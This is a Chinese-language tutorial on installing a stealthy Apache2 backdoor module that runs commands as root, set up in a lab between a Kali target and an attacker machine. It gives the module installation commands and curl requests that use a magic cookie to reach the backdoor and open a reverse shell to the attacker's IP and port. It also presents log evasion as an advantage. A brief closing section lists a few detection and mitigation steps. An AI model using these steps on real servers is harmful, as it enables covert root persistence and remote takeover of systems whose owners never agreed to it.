Apache2之隐形后门

0x00:简介

mod_backdoor是使用Apache2模块的隐形后门。

主要思路是在Apache2进程加载其配置后对其进行fork()处理。由于它是在root用户将进程转移到www-data之前创建的，因此您可以root身份执行命令。 由于Apache2仅在(重新)启动时才加载其配置，因此面临的难度是防止apache2进程挂掉，因此来到达维持权限的目的！！！

当攻击者在目标服务器植入后门以后 , 一旦攻击者向服务器发送的HTTP请求存在 Backdoor这个请求头 , Backdoor 这个请求头的值作为命令执行。

0x01:过程

1、环境部署

靶机：apache kali 172.20.10.3

攻击：mac 172.20.10.11

采用github现有的项目:

https://github.com/VladRico/apache2_BackdoorMod

将两个文件分别放入apache对应的目录位置

将mod_backdoor.so文件复制到 /usr/lib/apache2/modules/目录下

将backdoor.load文件复制到 /etc/apache2/mods-available/目录下

靶机执行命令：

命令一:a2enmod backdoor

命令二:systemctl restart apache2

执行完以上两个命令后让后门模块生效

2、后门测试

mac 攻击

curl -H 'Cookie: password=backdoor' http://172.20.10.3:8080/ping

显示"后门模块正在运行"

用攻击者电脑启动NC监听

接着执行

curl -H 'Cookie: password=backdoor' http://172.20.10.3:8080/reverse/172.20.10.11/1337/bash

反弹shell

命令解析:/reverse/172.20.10.11/1337/bash

172.20.10.11:shell接收IP

1337:shell接收端口

bash:shell反弹方式

回显：Sending Reverse Shell to 172.20.10.11:1337 using bash

shell反弹成功

优势:在于日志不会记录每个包含此cookie的请求!!!!

0x02:防范

1、检查以下目录是否存在异常模块。

/etc/apache2/mods-available/
/usr/lib/apache2/modules/

2、定时重启服务器。

3、部署其他流量捕获的设备